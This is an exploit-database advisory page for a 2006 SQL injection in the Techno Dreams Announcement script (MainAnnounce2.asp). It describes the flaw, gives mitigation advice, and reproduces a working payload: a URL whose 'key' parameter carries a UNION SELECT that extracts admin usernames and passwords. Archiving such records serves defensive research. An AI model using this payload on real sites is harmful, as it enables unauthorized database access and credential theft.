header-logo
Suggest Exploit
vendor:
MainAnnounce2.asp
by:
ajann
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: MainAnnounce2.asp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'key' parameter to '/MainAnnounce2.asp' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database, gain access to sensitive data, modify application's data, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before passing to the SQL query. It is also recommended to use stored procedures and parameterized queries.
Source

Exploit-DB raw data:

*******************************************************************************
# Title  :  Techno Dreams Announcement (MainAnnounce2.asp) Remote SQL Injection Vulnerability
# Author :   ajann
# Script Page: http://www.t-dreams.com

*******************************************************************************

###http://[target]/[path]/MainAnnounce2.asp?key=[  SQL ]

Example:

//MainAnnounce2.asp?key=204%20union%20select%200,UserName,0,Password,0%20from%20admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-10-30]